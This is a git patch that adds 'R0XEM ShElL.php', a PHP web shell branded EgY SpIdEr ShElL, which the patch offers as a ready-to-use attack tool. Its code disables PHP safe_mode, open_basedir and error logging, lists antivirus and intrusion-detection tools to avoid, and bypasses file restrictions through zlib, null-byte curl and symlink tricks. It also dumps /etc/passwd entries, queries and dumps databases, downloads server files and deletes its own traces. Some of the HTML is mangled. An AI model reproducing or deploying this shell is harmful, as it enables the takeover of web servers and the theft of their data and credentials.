From 972c5ec68c015a4e1662704ba1fe8307dfd051d7 Mon Sep 17 00:00:00 2001 From: Anthony Cozamanis Date: Tue, 6 Oct 2015 15:25:11 +0800 Subject: [PATCH 1/2] Added R0XEM ShElL --- php/R0XEM ShElL.php | 6485 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 6485 insertions(+) create mode 100644 php/R0XEM ShElL.php diff --git a/php/R0XEM ShElL.php b/php/R0XEM ShElL.php new file mode 100644 index 0000000..f635af7 --- /dev/null +++ b/php/R0XEM ShElL.php @@ -0,0 +1,6485 @@ + $val) { + if (!isset($tacfg[$key])) $tacfg[$key] = $val; +} + + +if (!$tacfg['ownsessions']) { + session_name('txtauth'); + session_start(); +} + + +// Logout attempt made. Deletes any remember-me cookie as well +if (isset($_GET['logout']) || isset($_POST['logout'])) { + setcookie('txtauth_'.$rmgroup, '', time()-86400*14); + if (!$tacfg['ownsessions']) { + $_SESSION = array(); + session_destroy(); + } + else $_SESSION['txtauthin'] = false; +} +// Login attempt made +elseif (isset($_POST['login'])) { + if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) { + $_SESSION['txtauthin'] = true; + if ($_POST['rm']) { + // Set remember-me cookie for 2 weeks + setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14); + } + } + else $err = 'Login Faild !'; +} +// Remember-me cookie exists +elseif (isset($_COOKIE['txtauth_'.$rmgroup])) { + if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) { + $_SESSION['txtauthin'] = true; + } + else $err = 'Login Faild !'; +} +if (!$_SESSION['txtauthin']) { +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + + +@ini_set('error_log',NULL); +@ini_set('log_errors',0); +?> + + + +<?=$tacfg['title']?> + + + +'; + + + +

+
+

+

+ +
+

+ +

+
+ +':''?> + + + + + + + + + +
'.$err.'
User:
Password:
+
+
+
+
+ + +

+
+
Developed by + EgY SpIdEr · copyright © + & EgY SpIdEr
+ + + + + +Login As () Logout

+
+Not Found");} + + +$language='eng'; + + +$auth = 0; + + +$name='7d1f6442a9ed59e62f93dcbc2695baa6'; +$pass='7d1f6442a9ed59e62f93dcbc2695baa6'; + + +//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 +@setlocale(LC_ALL,'ru_RU.cp1251'); + + +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + + +if(@function_exists('ini_set')) + { + @ini_set('error_log',NULL); + @ini_set('log_errors',0); + @ini_set('file_uploads',1); + @ini_set('allow_url_fopen',1); + } +else + { + @ini_alter('error_log',NULL); + @ini_alter('log_errors',0); + @ini_alter('file_uploads',1); + @ini_alter('allow_url_fopen',1); + } + +error_reporting(E_ALL); + + +/* ??? ????? */ +$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); +$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); +$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); +$downloaders = array('wget','fetch','lynx','links','curl','get'); + + +/* ??? ?????? ???????? ???? ????? realpath() */ +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.01234567890"; +$chars_rlph = "abcdefghijklnmopqrstuvwxyz"; + + +$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', +'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', +'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', +'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing'); + + +/******************************************************************************************************/ + + +define("starttime",@getmicrotime()); + + +if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; + + +set_magic_quotes_runtime(0); +@set_time_limit(0); +if(@function_exists('ini_set')) + { + @ini_set('max_execution_time',0); + @ini_set('output_buffering',0); + } +else + { + @ini_alter('max_execution_time',0); + @ini_alter('output_buffering',0); + } +$safe_mode = @ini_get('safe_mode'); +#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; +$version = '1.42'; +if(@version_compare(@phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="HELLO!"'); + header('HTTP/1.0 401 Unauthorized'); + exit("

Access Denied

"); + } +} + + +if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { + $tempdir='./'; + $select_tempdir = ''; +}else{ + if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} + $select_tempdir = $_COOKIE['select_tempdir']; +} + + +$head = ' + + + + + + +EgY_SpIdEr ShElL + + + + + + + +'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} + + +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } + + +function moreread($temp){ +global $lang,$language; +$str=''; + if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ + if($ffile){ + while(!@feof($ffile)){$str .= @fgets($ffile);}; + fclose($ffile); + } + }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ + if($ffile){ + $str = @fread($ffile, @filesize($temp)); + @fclose($ffile); + } + }elseif(@function_exists('file')&&($ffiles = @file($temp))){ + foreach ($ffiles as $ffile) { $str .= $ffile; } + }elseif(@function_exists('file_get_contents')){ + $str = @file_get_contents($temp); + }elseif(@function_exists('readfile')){ + $str = @readfile($temp); + }elseif(@function_exists('highlight_file')){ + $str = @highlight_file($temp); + }elseif(@function_exists('show_source')){ + $str = @show_source($temp); + }else{echo $lang[$language.'_text56'];} +return $str; +} + + +function readzlib($filename,$temp=''){ +global $lang,$language; +$str=''; + if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; + if(@copy("compress.zlib://".$filename, $temp)) { + $str = moreread($temp); + } else echo $lang[$language.'_text119']; + @unlink($temp); +return $str; +} + + +function morewrite($temp,$str='') +{ +global $lang,$language; + if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fwrite($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fputs($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('file_put_contents')){ + @file_put_contents($temp,$str); + }else return 0; +return 1; +} + + +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!@function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!@function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!@function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + case 'MySQLi': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysqli_connect')) return 0; + $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); + if(is_resource($this->connection)) return 1; + break; + case 'mSQL': + if(!@function_exists('msql_connect')) return 0; + $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'SQLite': + if(!@function_exists('sqlite_open')) return 0; + $this->connection = @sqlite_open($this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + case 'MySQLi': + return 1; + break; + case 'mSQL': + if(@msql_select_db($this->base,$this->connection)) return 1; + break; + case 'SQLite': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + case 'MySQLi': + if(false===($this->res=@mysqli_query($this->connection,$query))) + { + $this->error = @mysqli_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'mSQL': + if(false===($this->res=@msql_query($query,$this->connection))) + { + $this->error = @msql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'SQLite': + if(false===($this->res=@sqlite_query($this->connection,$query))) + { + $this->error = @sqlite_error_string($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MySQLi': + $this->num_rows=@mysqli_num_rows($this->res); + $this->num_fields=@mysqli_num_fields($this->res); + while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); + @mysqli_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'mSQL': + $this->num_rows=@msql_num_rows($this->res); + $this->num_fields=@msql_num_fields($this->res); + while(false !== ($this->rows[] = @msql_fetch_array($this->res))); + @msql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'SQLite': + $this->num_rows=@sqlite_num_rows($this->res); + $this->num_fields=@sqlite_num_fields($this->res); + while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MySQLi': + $this->dump[0] = '## MySQLi dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'mSQL': + $this->dump[0] = '## mSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'SQLite': + $this->dump[0] = '## SQLite dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + case 'MySQLi': + @mysqli_close($this->connection); + break; + case 'mSQL': + @msql_close($this->connection); + break; + case 'SQLite': + @sqlite_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + case 'MySQLi': + return @mysqli_affected_rows($this->res); + break; + case 'mSQL': + return @msql_affected_rows($this->res); + break; + case 'SQLite': + return @sqlite_changes($this->res); + break; + default: + return 0; + break; + break; +case 'cURL': + if(empty($_POST['egy_spider'])){ + + + + +} else { +$curl=$_POST['egy_spider']; +$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +echo ""; + + +} +break; +case 'copy': + + +if(empty($snn)){ +if(empty($_GET['snn'])){ +if(empty($_POST['snn'])){ + + +} else { +$u1p=$_POST['snn']; +} +} else { +$u1p=$_GET['snn']; +} +} + $u1p=""; // File to Include... or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + + + +$temp=tempnam($tymczas, "cx"); + + +if(copy("compress.zlib://".$snn, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +echo ""; +} +break; +case 'ini_restore': + if(empty($_POST['ini_restore'])){ +} else { + + +$ini=$_POST['ini_restore']; +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +require_once("$ini"); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +include($_GET["egy"]); +echo ""; +} +break; +case 'glob': +function reg_glob() +{ +$chemin=$_REQUEST['glob']; +$files = glob("$chemin*"); + + + + +foreach ($files as $filename) { + + + echo "$filename\n"; + + +} +} + + +if(isset($_REQUEST['glob'])) +{ +reg_glob(); +} + + +break; + case 'sym1': + if(empty($_POST['sym1p'])){ + } else { +$symp=$_POST['sym1p']; + } + if(empty($_POST['sym1p2'])){ + + +} else { +$symp2=$_POST['sym1p2']; + + + symlink("a/a/a/a/a/a/", "dummy"); +symlink("dummy".$symp2."".$symp."", "xxx"); +unlink("dummy"); +while (1) { +symlink(".", "dummy"); + + + } + } + break; + case 'sym2': + @include(xxx); + + + break; + case 'plugin': + if ($_POST['plugin'] ){ + + + + + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "\n"; + } + } + echo ""; + } + + + } + } + } +if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if($file=moreread($_POST['d_name'])){ $filedump = $file; } + else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['1'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } +if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo ''; + if(!$sql->connect()) echo "
Can't connect to SQL server
"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "
Can't select database
"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; + switch($sql->query($query)) + { + case '0': + echo "
Error : ".$sql->error."
"; + break; + case '1': + if($sql->get_result()) + { + echo ""; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode(" "; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode(" '; + } + echo "
 ", $sql->columns); + echo "
 ".$keys." 
 ",$sql->rows[$i]); + echo '
 '.$values.' 
"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "
affected rows : ".$ar."

"; + break; + } + } + } + } + } + echo "
"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "
"; + echo "Base: base."\">
"; + echo "


"; + echo "
"; + echo "
[ BACK ]
"; die(); + } +if(isset($_GET['12'])) + { + @unlink(__FILE__); + } +if(isset($_GET['11'])) + { + @unlink($tempdir.'bdpl'); + @unlink($tempdir.'back'); + @unlink($tempdir.'bd'); + @unlink($tempdir.'bd.c'); + @unlink($tempdir.'dp'); + @unlink($tempdir.'dpc'); + @unlink($tempdir.'dpc.c'); + @unlink($tempdir.'prxpl'); + @unlink($tempdir.'grep.txt'); + } +if(isset($_GET['2'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return 'no value'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '', true); + return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '', ''; + foreach (@ini_get_all() as $key=>$value) + { + $r .= ''; + } + echo $r; + echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; + } +echo "
[ BACK ]
"; +die(); +} +if(isset($_GET['3'])) + { + echo $head; + echo '
CPU
'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +if(isset($_GET['4'])) + { + echo $head; + echo '
MEMORY
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } + + + + + if(isset($_GET['tool'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } + if(isset($_GET['tools'])) { /*########################################### +code 2 +###########################################*/ +?> + +EgY SpIdEr ShElL + + + +";$ef=""; +$st=""; +$et="
